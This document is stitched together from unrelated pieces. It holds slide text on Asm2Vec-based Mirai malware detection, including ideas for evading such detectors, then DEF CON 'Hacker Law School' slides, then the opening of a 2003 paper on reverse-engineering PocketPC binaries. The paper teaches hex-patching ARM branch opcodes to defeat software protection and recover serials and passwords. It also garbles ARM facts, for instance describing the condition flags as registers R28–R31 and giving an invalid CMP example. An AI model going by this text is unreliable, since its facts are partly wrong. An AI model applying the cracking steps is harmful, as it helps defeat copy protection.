call Sleep
jmp block_b
...
asmscript
#Asm2Vec
#PE
File Header Opt Header
.AddressOfEntryPoint
.text
6A 00
68 AD DE 00 00
68 EF BE 00 00
6A 00
FF 15 FE CA 00 00
33 C0
C3
Control Flow Graph
#1: block_a → block_c → Exit
#2: block_a → block_c → block_d →
block_b → block_c → Exit
#3: block_a → block_c → block_d →
block_b → block_c → block_d →
block_b → block_c → Exit
#4: block_a → block_c → block_d →
block_b → block_c → block_d →
block_b → block_c → block_d →
block_b → block_c → Exit
/?rndWalk
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
block_c:
block_b:
block_a:
jmp block_c
push 0x3E8
call Sleep
jmp block_b
jmp block_b
block_d:
jg Exit
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
...
/?rndWalk
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
block_c:
block_b:
block_a:
jmp block_c
push 0x3E8
call Sleep
jmp block_b
jmp block_b
block_d:
jg Exit
asmscript
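A toy Python sketch of this serialization: repeated random walks over the CFG produce linear "asm scripts" like the paths #1 to #4 above (block contents and the walk policy are simplified; the real model uses edge-coverage sampling):

import random

CFG = {                       # block -> possible successors
    "block_a": ["block_c"],
    "block_b": ["block_c"],
    "block_c": ["block_d", "exit"],
    "block_d": ["block_b"],
}

def random_walk(cfg, entry="block_a", max_len=16):
    path, cur = [entry], entry
    while cur != "exit" and len(path) < max_len:
        cur = random.choice(cfg[cur])
        path.append(cur)
    return path               # e.g. ['block_a', 'block_c', 'block_d', 'block_b', ...]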
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
sub rsp, 138h
lea eax, [ebx+4]
push rbp
vocab = {
'sub': [-0.53, 0.01 ... -0.08],
'rsp': [ 0.12, 0.31, ... 0.34],
'lea': [-0.75,-0.42, ... -0.72],
'push': [ 0.23, 0.37, ... -0.23],
'[ebx+4]':[-0.02,-0.19, ... 0.11],
...
}
Tokenize
200 dim
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
sub rsp, 138h
operands
lea eax, [ebx+4]
push rbp
...
operator
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
sub rsp, 138h
operands
operator
Ƭ(instruction) = Ƭ(sub) || ( Ƭ(rsp)/2 + Ƭ(138h)/2 )
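A Python sketch of this formula (placeholder 200-dim vectors; a simplification of the paper's exact dimensioning): concatenate the operator vector with the average of the operand vectors.

def instr_vec(vocab, operator, operands):
    op = vocab[operator]
    if operands:
        avg = [sum(vocab[o][i] for o in operands) / len(operands)
               for i in range(len(op))]
    else:                                  # e.g. 'nop' -> null operand part
        avg = [0.0] * len(op)
    return op + avg                        # T(operator) || averaged operands

vocab = {"sub": [0.1] * 200, "rsp": [0.2] * 200, "138h": [0.3] * 200}
v = instr_vec(vocab, "sub", ["rsp", "138h"])   # == T(sub) || (T(rsp)/2 + T(138h)/2)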
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
push rbp
operands
operator
Ƭ(instruction) = Ƭ(push) || ( Ƭ(rbp) )
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
nop
nop (null)
operands
operator
Ƭ(instruction) = Ƭ(nop) || ( null )
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
...
Ƭ("sub rsp, 138h")
Ƭ(rsp)
[-0.53, 0.01 ... -0.08]
sigmoid(x)
Avg(x)
Ƭ(rbp)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
Ƭ(8h)
Avg(x)
Ƭ(rax)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
predict
θfs
Avg(x)
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
...
Ƭ("sub rsp, 138h")
Ƭ(rsp)
[-0.53, 0.01 ... -0.08]
sigmoid(x)
Avg(x)
Ƭ(rbp)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
Ƭ(8h)
Avg(x)
Ƭ(rax)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
loss
θfs
loss1/3
loss1/3
loss1/3
Avg(x)
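A drastically simplified Python sketch of one training step from the diagram: average the function vector θfs with the neighboring instruction vectors, then nudge vectors toward the target token and away from negative samples (context-instruction updates are omitted for brevity).

import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def train_step(theta_fs, ctx_vecs, target_vec, neg_vecs, lr=0.025):
    n = 1 + len(ctx_vecs)
    hidden = [(t + sum(c[i] for c in ctx_vecs)) / n
              for i, t in enumerate(theta_fs)]
    for vec, label in [(target_vec, 1.0)] + [(v, 0.0) for v in neg_vecs]:
        g = label - sigmoid(sum(h * w for h, w in zip(hidden, vec)))
        for i in range(len(vec)):
            theta_fs[i] += lr * g * vec[i]     # update the function vector θfs
            vec[i]      += lr * g * hidden[i]  # update the token vector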
• Dataset
- malware: Mirai samples from VirusTotal (40000+)
- benign: ELF binaries from Linux-based IoT firmware (3600+)
- stripped binaries
• Training
- randomly choose only 25 Mirai samples to train
- each token represented by a 200-dim vector (randomly initialized)
- negative sampling: 25 tokens
- decreasing learning rate: 0.025 → 0.0025
• Cross validation: 10 times
• Malicious: Similarity(binary, model) >= 95%
$./exp
• MIPS
- Mirai: 96.75% (18467 samples)
- Benign: 96.41% (348 samples)
• x86
- Mirai: 96.75% (2564 samples)
- Benign: 99.93% (1567 samples)
• ARM
- Mirai: 98.53% (23827 samples)
- Benign: 93.87% (1699 samples)
$./exp
/>Demo
〉〉〉Challenge
/!challenge
github.com/aaaddress1/theArk
/!PluginX
DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry
#include <cstdio>
int main(void) {
  try {
    *(char*)NULL = 1;   // hardware access violation, not a C++ exception
  } catch (...) {       // only reached under SEH-style handling (e.g. MSVC /EHa)
    puts("Hell Kitty");
  }
}
/!challenge
/!challenge
github.com/xoreaxeaxeax/movfuscator
• Issues based on Control Flow Walking
- Self-modifying code
1. Software packers e.g. VMProtect, Themida
2. Shellcode encoders
- Control Flow Rerouting
1. Error handling e.g. SEH
2. MultiThread
- Exported malicious function
- Virtual Method Table
• Vector Obfuscation
- 95% benignware / 5% injected shellcode
- Use common instructions as gadgets to build an obfuscation chain e.g. movfuscator
/!challenge
41414141414141414141414141
Thanks!
Slide
Github
@aaaddress1
Facebook
HITCON
Hacker Law School
"We went to law school so you don't have to"
2013 Summer Quarter
D E F C O N
Faculty Bio
Marcia Hofmann
• Currently solo digital rights attorney
• 7 Years at the EFF
• 3 Years at EPIC
• Adjunct faculty at the University of California
Hastings College of Law in San Francisco
• Licensed to practice law in CA, DC
Faculty Bio
Jim Rennie
• 3 years doing Internet privacy compliance &
policy work in San Francisco
• 3 years as a Public Defender in Las Vegas
• Prior to law school, 3 years as a web developer
• Attended way too many hacker cons over the last
14 years
• Licensed to practice law in CA, NV
Disclaimers
I am not YOUR attorney
• Nothing you say to me is covered by attorney-
client privilege
• I don't know enough about your particular
situation to advise you personally
This is not "legal advice"
• This is a very general overview and may not
apply to you or your specific situation
• Don't get your legal advice from someone at a
con (even if we're correct about the law)
What is Hacker Law School?
The basic legal education you need
(and should’ve been taught in high school),
customized for the hacker community
What You're Going to Learn
The basics of:
Intellectual Property
Criminal/Civil Substantive Law
Criminal Procedure
How the law applies to real life situations
Why learn about these laws?
If you're doing online security research,
you need to be able to understand the risks.
What do you mean by "risk"?
A couple distinct, separate things.
(1) The likelihood of becoming an attractive target for
a lawsuit or prosecution, either with or without basis.
(2) The likelihood that a court might decide that
you’ve run afoul of the law.
What You're NOT Going to Learn
Anything other than the basics for risk-spotting
To be afraid
Feedback
Hacker Law School is always changing,
updating, and making itself better
Please let us know if you have questions
or suggestions for improvement
[email protected]
[email protected] | pdf |
Page 1 of 1 © 2003 Airscanner™ Corp. http://www.Airscanner.com
Embedded Reverse Engineering:
Cracking Mobile Binaries
1. Overview
Reverse-engineering has long been one of the most popular troubleshooting techniques.
In fact, long before the first hacker ever laid eyes on a computer screen, technicians,
engineers, and even hobbyists were busy tearing apart mechanical devices to see if they
could deduce their seemingly magical operations with the hopes of making it work better,
or at the very least, hoping they could understand what made a device tick. Over the
years, this concept has been passed on to the computer profession, where the concept of
reverse-engineering evolved into one of the most powerful methods of learning available.
Ironically, this very useful technique has fallen under attack and is being threatened by
various nefarious Acts and policy control groups.
If a computer professional has been in the field for any length of time, they have already
used reverse-engineering to their benefit. In fact, the open-source community uses
reverse-engineering as one of their main tools for learning software and figuring out what
a program does, or in some cases, doesn't do. However, there is one major branch of
computing that has had little headway in the arena of reverse-engineering. This elusive
niche is the PocketPC application.
To help fill this gap, and to increase the awareness of PocketPC reverse-engineering, this
paper/discussion will provide an overview of what is required, and how one can reverse-engineer their PocketPC. The following pages will provide an overview of the PocketPC environment, the tools required to successfully reverse-engineer Windows CE, and the
methods by which a person can dig deep inside an application to alter code as they see fit.
Note, this article/discussion will skirt the borders of many ethical and moral issues. The
information in this paper is presented from a researcher's point of view for educational
purposes only. We firmly believe that when a product is purchased, be it a can of soup or
software program, the owner should be able to do with it as they please, with the arguable
exception of manipulative EULA in which the software is rented. Please note, the
information presented is not meant to promote the theft of software.
2. Windows CE Architecture
Windows CE is the operating system of choice for most pocket PC devices. As such, it is
important to understand the basics of how this operating system works to become
proficient at reverse engineering on the PPC platform. This segment of the paper will
outline the particulars of Windows CE, and what it means to you when researching the
characteristics of a program. Note, this segment will only briefly cover the Windows CE
architecture, with some deeper looks at sections important to understand when reverse-
engineering a program. For more information about this subject, Microsoft.com provides a wealth of information. Please note that much of this information can be
applied to any Windows OS; therefore, please feel free to jump ahead if you are familiar
with this subject.
2.1 Processors
In this world of miniature gadgets, only so much is possible. Physical properties often
determine how far technology can go. In the case of pocket PCs this is also true. Heat generated by high-speed processors in notebook PCs has been known to burn people and even has provided enough heat to fry eggs. If the same processor were used in a pocket PC, a user would have to wear hot pads just to hold it.
As a result, Windows CE devices are limited in their choice of processors. The following
is the list of processors supported by Windows CE.
ARM: Supported processors include ARM720T, ARM920T, ARM1020T,
StrongARM, XScale
MIPS: Supported processors include MIPS II/32 w/FP, MIPS II/32 w/o FP,
MIPS16, MIPS IV/64 w/FP, MIPS IV/64 w/o FP
SHx: Supported processors include SH-3, SH-3 DSP, SH-4
x86: Supported processors include 486, 586, Geode, Pentium I/II/III/IV
If heat dissipation is a serious issue, the best choice is one of the non-x86 processors that
use a reduced level of power. The reduction in power consumption will reduce the
amount of heat that is created during processor operation, but also limits the processor
speed.
2.2 Kernel, Processes, and Threads
The following section will describe the core of the Windows CE operating system, and how
it processes information.
2.2.1 Kernel
The kernel is the key component of a Windows CE device. It handles all the core
functions of the OS, such as process, thread and memory management. In addition, it also
handles scheduling and interrupt handling. However, it is important to understand that Windows CE uses parts of the desktop Windows software. This means it has a similar threading, processing, and virtual memory model to the other Windows OSes.
While the similarities are undeniable, there are several items that make this OS a
completely different beast. These center on the use of memory and the simple fact that
there is no hard drive (discussed later in the Memory Architecture section). In addition,
DLLs in Windows CE are not implemented as they are in other Windows operating
systems. Instead, they are used in such a way as to maximize the amount of available
memory. By integrating them into the core operating system, DLLs don't take up precious
space when they are executed. This is an important concept to understand before
attempting to RVE a program in Windows CE. Due to this small difference, attempting to
break a program while it is executing a system DLL is not allowed by Microsoft's EVT
(MVT).
2.2.2 Processes
A process in Windows CE represents an executing program. The number of processes is
limited to 32, but each process can execute a theoretically unlimited number of threads.
Each thread has a 64k memory block assigned to it, an ID, and a set of registers. It is
important to understand this concept because when debugging a program, you will be
monitoring the execution of a particular thread, its registers, and the allotted memory
space. By doing this, you will be able to deduce hidden passwords, serial numbers, and
more.
Processes can run in two modes; kernel and user. A kernel process has direct access to
the OS and the hardware. This gives it more power, but a crash in a kernel process will
often crash the whole OS. A user process, on the other hand, operates outside the kernel
memory, but a crash will only kill the running program, not the whole OS. In Windows
CE, any 3rd party program will operate in user mode, which means it is protected. In other
words, if you crash a program while RVEing it, the whole OS won't crash (though you
still may need to soft boot the device).
There are two other points that should be understood. First, one process cannot affect another process's data. While related threads can interact with each other, a process is
restricted to its own memory slot. The second point to remember is that each existing
thread is continuously being stopped and restarted by a scheduler (discussed next). This is
how multitasking is actually performed. While it may appear that more than one program
is running at a time, the truth remains that only one thread may execute at any one time.
2.3 Scheduler
The Scheduler is responsible for managing each thread's processor time. It does this by giving
each thread a chance to use the processor. By continuously moving from thread to thread,
the scheduler ensures that each gets a turn. Built into the scheduler are three important
features that are important to understand.
The first feature is a method that is used to increase the amount of processor time. The
secret is found in multi-threading an application. Since the Scheduler assigns processor
time at the thread level, a process with 10 threads will get ten times the processor time of a process with one thread.
Another method in gaining more processor time is to increase the process priority.
However, this is not encouraged unless necessary. Changing priority levels can cause
serious problems in other programs, and will affect the speed of the computer as a whole.
One priority that needs to be mentioned is THREAD_PRIORITY_TIME_CRITICAL, which forces the scheduler to keep running the critical thread until it is complete.
The final interesting fact deals with a problem that can arise when priority threading is
used. If a low priority thread is executing and it ties up a resource needed by a higher
priority thread, the system could become unstable. In short, this creates a paradox where the high thread waits for the low thread to finish, which is in turn waiting on the high to complete. To prevent this from occurring, the scheduler will detect such a paradox and boost the lower-priority thread to a higher level, allowing it to finish.
2.4 Memory Architecture
One of the most obvious properties of a device running Windows CE is that it doesn't
have a hard drive. Instead of spinning disks, pocket PCs use old-fashioned RAM (Random
Access Memory) and ROM (Read Only Memory) to store data. While this may seem like
a step back in technology, the use of static memory, like ROM, is on the rise and will
eventually make moving storage devices obsolete. The next few paragraphs will explain
how memory is used in a Windows CE device to facilitate program execution and use.
In a Windows CE device, the entire operating system is stored in ROM. This type of
memory is typically only read from and is not used to store temporary data that can be
deleted. On the other hand, data in RAM is constantly being updated and changed. This
memory is used to hold all files and programs that are loaded into the Windows CE-based
device, as well as the registry and various data files required by CE applications.
RAM not only stores data, but it is also used to execute programs. When a 3rd party
program is executed, it is first uncompressed, then copied into another part of RAM, and
executed from there. This is why having a surplus of RAM is important in a Windows CE
device. However, the real importance of RAM is found in the fact that its data can be
written to and accessed by an address. This is necessary because a program will often
have to move data around. Since a program is allotted a section of RAM to run in when it
is executed, it must be able to write directly to its predefined area.
While ROM is typically only used as a static storage area, in Windows CE it can be used to execute programs, which is known as Execute In Place (XIP). In other words, RAM won't be required to hold the ROM's data as a program executes. This allows RAM to be
used for other important applications. However, this only works with ROM data that is
not compressed. While compression will allow more data to be stored in ROM, the
decompression will force any execution to be done via the RAM.
RAM in a Windows CE device is split between two functions. The first is object store,
which is used to hold files/data that is used by the programs, but is not stored in the
ROM. In particular, the object store holds compressed program/user files, database files
that hold structured data, and the infamous Windows registry file. Though this data is
stored in RAM, it remains intact when the device is 'turned off'. This is due to the fact
that the RAM is kept charged by the power supply, which is why it is very important to
never ever let the charge on a pocket PC completely die. If this happens, the RAM will lose power and will reset. This will then dump all installed programs and will basically
wipe everything on the device except for what is stored in ROM. This is also referred to
as a hard boot when dealing with a pocket PC device.
The second function of the RAM is to facilitate program execution. As previously
mentioned, when a program is running it needs to store information it is using. This is the
same function that RAM serves on a typical desktop PC. However, this also means that
any data passing through a program, such as a password or serial number, will be written
to the RAM at one time or another.
Windows CE does have a limit on the RAM size. In Windows CE 3.0 it is 256 MB with a
32 MB limit on each file, but in Windows CE .NET this value has been increased to a
rather large 4GB. In addition, there is a limit to the number of files that can be stored in
RAM of 4,000,000. There are other limits, such as the number of programs that can operate at the same time, which brings us to multitasking.
Windows CE was designed to be a multitasking operating system. Just like other
Windows operating systems, this is important to allow more than one program to be open
at a time. In other words, you can listen to an MP3 while taking notes, and checking out
sites on the Internet. Without multitasking, you would be forced to close one program
before opening another. However, you must be careful opening too many programs on a Windows CE device. Since you are limited by the amount of RAM in the device and each
open program takes up a chunk of the RAM, you can quickly run out of space.
Finally, the limitation of RAM in a pocket PC also has impacted the choice of operating
system. Since Windows CE devices only have 32-128 MB of internal RAM, they don't
make good platforms for operating systems that use a lot of memory, such as Embedded
Windows XP. In this OS, the minimum footprint for a program is 5MB. On the other
hand, Windows CE only requires 200k; this is a 2500% difference. When RAM is limited
by space and pricing considerations, the effects are far-reaching.
2.5 Graphics, Windowing and Event Subsystem (GWES)
This part of the Windows CE architecture is responsible for handling all the input (e.g.
stylus) and output (e.g. screen text and images). Since every program uses windows to
receive messages, this is a very important and key part of Windows CE. As a result, this
is also one of the key areas you need to understand to successfully RVE a program.
Without going into too much detail, you should know that every Windows CE process
created when a program executes is assigned its own windows messaging queue. This
queue is similar to a stack of papers, which is added to and read from. This queue is
created when the program calls GetMessage, which is very common in Windows CE
programs. While the program executes and interacts with the user, messages are placed
on and removed from the queue. The following is a list and explanation of the common commands that you will see while RVEing.
PostMessage
Places a message on the queue of the target thread and returns immediately to the calling process/thread.
SendMessage
Places a message on the queue, but does not return until it is processed.
SendThreadMessage
Sends messages directly to the thread instead of the queue.
These Message commands, and others, act as virtual flares when RVEing a program. For
example, if a “Sorry, wrong serial number” warning is flashed to the screen, you can bet
that some Message command is used. Therefore, by looking for the use of this command
in a disassembler, you can find the part of the program that needs further research.
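As a practical illustration (not from the original paper), the following Python sketch scans a binary for message-API names and give-away UI strings. Windows CE stores most UI text as UTF-16LE, so each marker is searched in both raw and wide form; the marker list itself is illustrative.

import sys

def find_flares(path, markers=(b"MessageBoxW", b"Sorry, wrong serial")):
    data = open(path, "rb").read()
    for m in markers:
        for needle in (m, m.decode().encode("utf-16-le")):
            off = data.find(needle)
            if off != -1:
                # a good offset to start from in your disassembler
                print("0x%08x  %r" % (off, needle))

find_flares(sys.argv[1])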
2.6 Summary
The last few pages have given you an inside look at how Windows CE operates. This
information is required reading for the rest of this paper. In fact, by understanding how a
processor deals with threads, the memory architecture, and how Windows CE uses
messages to communicate with the executing program, you will have an easier time
understanding how RVE works. Just as a doctor must understand the human body before
troubleshooting even a headache, a reverse-engineer must understand the platform they are dissecting if they are going to be successful at making a patch or deciphering a serial number.
3 Reverse Engineering Fundamentals
3.1 Overview
When a developer writes a program, they typically use one of several languages. These
typically include Visual Basic, C++, Java or any one of the other lesser used languages.
The choice of language depends on several factors, the most common being space and speed considerations. In the infamously bloated Windows environment, Visual Basic is arguably the king. This is because the hardware required to run Windows is usually more
than enough to run any Visual Basic application. However, if the programmer needs a
higher level of speed and power, they will probably select C++.
While these upper level languages make programming easier by providing a whole
selection of Application Program Interfaces (API) and commands that are easy to
understand, there are many occasions where a programmer must create a program that
can fit in a very small amount of memory, and operate extremely quickly. To meet this
goal, they will choose to use a language known as Assembler. This low level language
allows a coder to write directly to the processor, thus controlling the hardware of the
computer directly. However, programming in assembler is very tedious and must be done
within a very explicit set of rules.
As we have hinted, programming languages exist on several different levels. The lowest
level languages speak right to the hardware, and typically require little in the way of
conversion. On the other hand, upper level languages like VB and SQL are often easy to
write. However, these languages must be compiled one or more times before the
instructions can be understood by the hardware responsible for executing them. In fact, many
of these upper level languages don't really have any way of controlling hardware, but
must make calls to other files and programs that can make hardware calls by proxy.
Without going too deep into the nuances of programming languages, the point of this
discussion is to ensure that you understand that almost every program will end up as
assembler code. Due to this, if you really want to have control over a computer and the
programs on the computer, you must understand assembler code. Since each and every
processor type uses its own set of assembler instructions, you need to focus on one device
(i.e. one processor type) and become fluent in the operation codes (opcodes), instruction
sets, processor design, and how the processor uses internal memory to read and write to
RAM. It is only after you have mastered the basics of the processor operation that you
can start to reverse-engineer a program. Fortunately, most processors operate very similarly
to each other, with slight variations in syntax and use of internal processor memory.
Since our target processor is the ARM processor used by PDAs, we will provide some of
the necessary information you need to know, or at least be familiar with, before
attempting to study a program meant to run on this processor type. The next few pages
will provide you with a description of the ARM processor, its major opcodes, their hex
equivalents, and how the memory is used. If you do not understand this information, you
may have some difficulty in following the rest of this paper.
3.2 Hex vs. Binary
To successfully RE a program, there are several concepts that you must understand. The
first is that no matter what programming language a file is written in, it will eventually be
converted to a language that the computer can understand. This language is known as
binary and exists in a state of ones and zeros. For example, the word “HACKER” in
binary is written as follows:
H = 01001000
A = 01000001
C = 01000011
K = 01001011
E = 01000101
R = 01010010
While people did code in binary at one time, this is very rare in today's interface-based
world. In fact, many operating systems do not display, store, or even transmit this binary
information as it really exists; instead, they use a format known as hex.
Hex, while still very cryptic, shortens the process of transmitting data by converting the
eight-digit binary byte into a two-character hex value. For example, the previously illustrated
word “HACKER” in binary would equate to the following in hex:
H = 48
A = 41
C = 43
K = 4B
E = 45
R = 52
In addition to the space considerations, experienced computer programmers can easily
understand hex characters. In fact, with nothing more than a simple hex editor, a
knowledgeable hacker can open an executable file and alter the hex code of the file to
remove protection, alter a program's appearance, or even install a Trojan. In other words,
understanding hex is one of the main requirements of being able to reverse-engineer a
program. To facilitate you in your endeavors, an ASCII/binary/hex chart has been
included in the appendix of this paper. In addition to this, you can find several conversion
web pages and programs online, and if all else fails, the Windows calculator will convert
hex to binary to decimal to octal, once it has been set to scientific mode.
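If you want to experiment, the following throwaway C program (not part of any tool discussed in this paper) prints each character of “HACKER” in both binary and hex:

    #include <stdio.h>

    int main(void)
    {
        const char *word = "HACKER";
        for (const char *p = word; *p; p++) {
            printf("%c = ", *p);
            for (int bit = 7; bit >= 0; bit--)          /* high bit first */
                putchar(((*p >> bit) & 1) ? '1' : '0');
            printf(" = 0x%02X\n", (unsigned char)*p);
        }
        return 0;
    }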
3.3 The ARM Processor
The Advanced RISC Machine (ARM) is a low-power 32-bit microprocessor based
on Reduced Instruction Set Computer (RISC) principles. In particular, the ARM is
used in small devices that have a limited power source and a low threshold for heat, such as
PDAs, telecommunication devices, and other miniature devices that require a relatively
high level of computing power.
3.3.1 Registers
There are a total of 37 registers within this processor that are used to hold values used in
the execution of code. Six of these registers are used to hold status values recording
the results of compare and mathematical operations, among others. This leaves 31
for use by the program, of which a maximum of 16 are generally available to the
programmer. Of these 16, Register 15 (R15) is used to hold the Program Counter (PC),
which is used by the processor to keep track of where in the program it is currently
executing. R14 is also used by the processor as a subroutine link register (Lr), which is
used to temporarily hold the value held by R15 when a Branch and Link (BL) instruction
is executed. Finally R13, known as the Stack Pointer (Sp), is used by the processor to
hold the memory address of the stack, which is used to store all values about to be used
by the processor in its execution.
In addition to these first 16 registers, a debugger allows the programmer to monitor the
last four registers (28-31), which are used to hold conditional values. These registers are
used to hold the results of arithmetic and logical operations performed by the processor
(e.g. addition, subtraction, compares, etc.). The following lists these registers and their
name/purpose. They are listed in descending order due to the fact that the processor bits
are read from high to low.
R31: Negative / Less Than
R30: Zero
R29: Carry / Borrow / Extend
R28: Overflow
Understanding these registers is very important when debugging software. By knowing
what each of these values means, you can be sure to know the next step the program will
make. In addition, using a good debugger, you can often alter these values on the fly, thus
maintaining 100% control over how a program flows. The following is a table of the
possible values and their meanings.
Value – Meaning
EQ – Zero set (equal)
NE – Zero clear (not equal)
CS – Carry set (unsigned higher or same)
CC – Carry clear (unsigned lower)
MI – Negative set
PL – Negative clear
VS – Overflow set
VC – Overflow clear
HI – Carry set and Zero clear (unsigned higher)
LS – Carry clear or Zero set (unsigned lower or same)
GE – Negative set and Overflow set, or Negative clear and Overflow clear (>=)
LT – Negative set and Overflow clear, or Negative clear and Overflow set (<)
GT – Zero clear, and either Negative set and Overflow set, or Negative clear and Overflow clear (>)
LE – Zero set, or Negative set and Overflow clear, or Negative clear and Overflow set (<=)
AL – Always
NV – Never
Table 1: ARM Status Codes
Figure 1 illustrates Microsoft's eMbedded Visual Tools (MVT) debugger showing us the
values held in registers 0-12, Sp, Lr, and PC. In addition, this figure also lets us see the
four registers (R31-R28) used to hold the conditional values. See if you can determine the
current status of the program using Table 1.
Figure 1: EVT illustrating the registers
Now that you understand how the status flags are updated, the following will help you
put that knowledge to some practical use. Again, being able to recognize how a program
works is essential to reverse-engineering.
Example Scenario #1
CMP #1, #0
In this case you can see that we are comparing two simple values. In real life, the #1
would be represented by a register (e.g. R0, R3, etc.), and #0 would be either a value or
another register. To determine how this comparison will alter the status flags, use the
following set of questions.
N: If #1 < #0 then N = 1, else N = 0. Result: N = 0
Z: If #1 = #0 then Z = 1, else Z = 0. Result: Z = 0
C: If #1 >= #0 then C = 1, else C = 0. Result: C = 1
O: If the calculation overflowed then O = 1, else O = 0. Result: O = 0
Using the above, determine the following.
CMP 23, 36
Negative: If 23 < 36 then N = 1, else N = 0. Result: N = 1
Zero (Equal): If 23 = 36 then Z = 1, else Z = 0. Result: Z = 0
Carry: If 23 >= 36 then C = 1, else C = 0. Result: C = 0
Overflow: If the calculation overflowed then O = 1, else O = 0. Result: O = 0
Now that you have seen how this works in the case of a CMP, we need to look at how the status
flags are updated in other situations. The next examples illustrate how the flags are updated in
the case of a MOVS opcode and an ANDS opcode.
MOVS R1, R0
In this case, you need to look at the status flags as they are labeled and update them
according to the value of R0. Use the following steps to determine the outcome.
N: If R0 < 0 then N = 1, else N = 0
Z: if R0 = 0 then Z = 1, else Z = 0
Two things to note from this example: the first is that R0 has to be a negative number for
the N flag to be set. This is possible, but only if the binary value starts with a 1. One
common value you will see is 0xFFFFFFFF. The second item to note is that the carry
value is not updated using the MOVS opcode.
ANDS R1, R0, 0xff
In the case of an ANDS opcode, the results are similar to that of the MOVS opcode. The
R0 value is used to determine the flags’ status. Use the following to determine the output
of the N and Z flags.
N: If R0 < 0 then N = 1, else N = 0
Z: if R0 = 0 then Z = 1, else Z = 0
There are many other opcodes that update the status flags. Some opcodes are implicit and
do not require the specification of the ‘S’; these update the status flags similarly to the
CMP opcode. The opcodes that have an explicit ‘S’ operate like the MOVS example.
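If it helps to see these rules as code, the following sketch models how a CMP a, b updates the four flags for unsigned 32-bit values; the struct and function names are invented for illustration.

    #include <stdint.h>

    struct Flags { int n, z, c, o; };

    /* CMP computes a - b and updates the flags without storing the result. */
    struct Flags cmp(uint32_t a, uint32_t b)
    {
        struct Flags f;
        uint32_t r = a - b;
        f.n = (r >> 31) & 1;                    /* Negative: top bit of result */
        f.z = (r == 0);                         /* Zero: set when values equal */
        f.c = (a >= b);                         /* Carry: no borrow occurred   */
        f.o = (((a ^ b) & (a ^ r)) >> 31) & 1;  /* Overflow, signed compare    */
        return f;
    }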
3.3.2 ARM Opcodes
The ARM processor has a pre-defined set of operation codes (opcodes) that allows a
programmer to write code. These same opcodes are used by compilers, such as
Microsoft's EVC, when a program is created for an ARM device. In addition to creating
programs, the opcodes are also used when a program is disassembled and/or debugged.
For this reason, it is important that you have an understanding of how opcodes are used,
and be able to recognize at least the most common opcodes, as well as what operation
they perform. The more familiar you are with the opcodes, the easier it will be to
determine what the code is doing. In addition, it is also important for you to have some
reference for the hex equivalents of the opcodes. You will need this to find and replace an
opcode as it appears in a hex dump of the file. While practice will ingrain the popular
opcodes into your memory, this short discussion will help get you started.
3.3.2.1 Branch (B)
The Branch opcode tells the processor to jump to another part of the program, or more
specifically the memory, where it will continue its execution. The B opcode is not to be
confused with the Branch with Link (BL) opcode discussed next. The main difference is
found in the fact that the B opcode simply is a code execution redirector. The program
will jump to the specified address and continue processing the instructions. The BL
opcode also redirects to another piece of code, but it will eventually jump back to the
original code and continue executing where it left off.
There are several variations of the B opcode, most of which make obvious sense. The
following is a list of the three most common variants and what they mean. Note that this
list relates to the condition table in the previous section. In addition, we have also
included the hex code that you will need to search for when altering a branch operation.
This is only a partial list. For a full list please visit the references section at the end of this
paper.
B    Branch                Always branches          XX XX XX EA
BEQ  Branch if equal       Branches if Z flag = 1   XX XX XX 0A
BNE  Branch if not equal   Branches if Z flag = 0   XX XX XX 1A
Examples:
B    loc_11498    07 00 00 EA
BEQ  loc_1147C    0C 00 00 0A
BNE  loc_11474    06 00 00 1A
3.3.2.2 Branch with Link (BL)
When a program is executing, there are situations where the program must branch out
and process a related piece of information before it can continue with the main program,
such as system calls (i.e. a message box). This is made possible with a Branch with Link
opcode. Unlike its relative, the B opcode, BL always returns to the code it was originally
executing. To facilitate this, register 14 is used to hold the original address from
which the BL was executed and the stack is used to hold any important register values.
The BL opcode has several variants to its base instruction, just like the B opcode. The
following is a list of the same three variants and what they mean, which will be followed
by examples. It is important to note that the examples show function calls instead of
address locations. However, if you look at the actual code you will find normal addresses,
just like the B opcode. The function naming is due to the fact that many BL calls are
made to defined functions that will return a value or perform a service. As you investigate
RVEing, you will become very intimate with the BL opcode. Note, the MVT debugger
will not jump to the BL address when doing a line-by-line execution. It will instead
perform the function and continue to the next line. If you want to watch the code
specified by the BL operate, you will need to specify a breakpoint at the memory address
it branches to. This concept will be discussed later in this paper.
BL    Branch with Link   Always branches    XX XX XX EB
